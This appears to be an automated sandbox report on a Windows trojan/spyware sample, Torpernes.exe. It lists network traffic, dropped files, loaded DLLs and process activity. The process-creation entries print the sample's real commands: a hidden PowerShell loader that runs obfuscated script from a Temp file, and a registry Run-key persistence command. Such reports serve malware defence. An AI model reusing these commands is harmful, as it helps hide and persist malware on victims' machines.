Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Torpernes.exe

0_2_00405200

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Contentious.exe

Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		0_2_004031FF
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		6_2_004031FF

Creates files inside the system directory

Source: C:\Users\user\Desktop\Torpernes.exe

File created: C:\Windows\resources\0809

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_0040646E	0_2_0040646E
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_00404A3D	0_2_00404A3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0457EAD8	1_2_0457EAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0457F3A8	1_2_0457F3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0457E790	1_2_0457E790
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0040646E	6_2_0040646E
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00404A3D	6_2_00404A3D
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00156108	6_2_00156108
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015C190	6_2_0015C190
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015B328	6_2_0015B328
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015C473	6_2_0015C473
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00156730	6_2_00156730
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015C754	6_2_0015C754
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015F778	6_2_0015F778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00159858	6_2_00159858
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015CA34	6_2_0015CA34
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00154AD9	6_2_00154AD9
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015BBBA	6_2_0015BBBA
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015BEB7	6_2_0015BEB7
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015E431	6_2_0015E431
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00153578	6_2_00153578
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015D7F0	6_2_0015D7F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0015D7E0	6_2_0015D7E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2042B0E0	6_2_2042B0E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2042C3EC	6_2_2042C3EC
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20514F11	6_2_20514F11
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB7588	6_2_20CB7588
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0D60	6_2_20CB0D60
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB3288	6_2_20CB3288
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF8C9	6_2_20CBF8C9
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF8D8	6_2_20CBF8D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB08F0	6_2_20CB08F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF480	6_2_20CBF480
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0491	6_2_20CB0491
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC4A8	6_2_20CBC4A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB04A0	6_2_20CB04A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC4B8	6_2_20CBC4B8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0040	6_2_20CB0040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC050	6_2_20CBC050
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC060	6_2_20CBC060
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF471	6_2_20CBF471
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBBC08	6_2_20CBBC08
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF018	6_2_20CBF018
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBF028	6_2_20CBF028
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0023	6_2_20CB0023
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD1C0	6_2_20CBD1C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6DF7	6_2_20CB6DF7
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD1B0	6_2_20CBD1B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBCD58	6_2_20CBCD58
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0D50	6_2_20CB0D50
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBCD68	6_2_20CBCD68
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC901	6_2_20CBC901
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB0900	6_2_20CB0900
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBC910	6_2_20CBC910
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB4924	6_2_20CB4924
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDEC8	6_2_20CBDEC8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBAEEF	6_2_20CBAEEF
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB3284	6_2_20CB3284
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDEB8	6_2_20CBDEB8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDA61	6_2_20CBDA61
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB7E78	6_2_20CB7E78
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBDA70	6_2_20CBDA70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD609	6_2_20CBD609
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6E00	6_2_20CB6E00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBD618	6_2_20CBD618
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBEBC1	6_2_20CBEBC1
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBEBD0	6_2_20CBEBD0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBBBF8	6_2_20CBBBF8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB77A8	6_2_20CB77A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB7A0	6_2_20CBB7A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB7B0	6_2_20CBB7B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB348	6_2_20CBB348
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBB358	6_2_20CBB358
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE768	6_2_20CBE768
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE778	6_2_20CBE778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBAF00	6_2_20CBAF00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE310	6_2_20CBE310
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CBE320	6_2_20CBE320
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23829FB0	6_2_23829FB0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382CBD0	6_2_2382CBD0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23828B00	6_2_23828B00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382BF30	6_2_2382BF30
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B290	6_2_2382B290
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238236D8	6_2_238236D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382A600	6_2_2382A600
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382D218	6_2_2382D218
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382DA48	6_2_2382DA48
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382C580	6_2_2382C580
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238285B0	6_2_238285B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820D48	6_2_23820D48
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820498	6_2_23820498
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B8E0	6_2_2382B8E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382AC48	6_2_2382AC48
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23829FA0	6_2_23829FA0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382CBC0	6_2_2382CBC0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238243D8	6_2_238243D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826FE8	6_2_23826FE8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826FF8	6_2_23826FF8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826713	6_2_23826713
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826720	6_2_23826720
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382BF20	6_2_2382BF20
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23823350	6_2_23823350
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23823360	6_2_23823360
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826B69	6_2_23826B69
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23826B78	6_2_23826B78
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B281	6_2_2382B281
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238262B8	6_2_238262B8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238262C8	6_2_238262C8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382D20A	6_2_2382D20A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825A08	6_2_23825A08
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825A18	6_2_23825A18
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825E60	6_2_23825E60
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825E70	6_2_23825E70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238285A0	6_2_238285A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238255B1	6_2_238255B1
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238255C0	6_2_238255C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382A5F0	6_2_2382A5F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827D00	6_2_23827D00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825138	6_2_23825138
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23825140	6_2_23825140
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23828148	6_2_23828148
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23828158	6_2_23828158
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382C570	6_2_2382C570
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820488	6_2_23820488
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827898	6_2_23827898
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238278A8	6_2_238278A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382B8D0	6_2_2382B8D0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238208E1	6_2_238208E1
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238208F0	6_2_238208F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827CF0	6_2_23827CF0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820007	6_2_23820007
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382AC37	6_2_2382AC37
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_2382743F	6_2_2382743F
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23820040	6_2_23820040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23822848	6_2_23822848
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23827450	6_2_23827450
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23822858	6_2_23822858

PE / OLE file has an invalid certificate

Source: Torpernes.exe

Static PE information: invalid certificate

Uses 32bit PE files

Source: Torpernes.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/11@4/4

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_004044C2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044C2

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03

Source: C:\Users\user\Desktop\Torpernes.exe

File created: C:\Users\user\AppData\Local\Temp\nsb2E4F.tmp

Jump to behavior

Source: Torpernes.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\Torpernes.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

File read: C:\Users\user\Desktop\Torpernes.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Torpernes.exe "C:\Users\user\Desktop\Torpernes.exe"
Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Torpernes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: version.dll	Jump to behavior
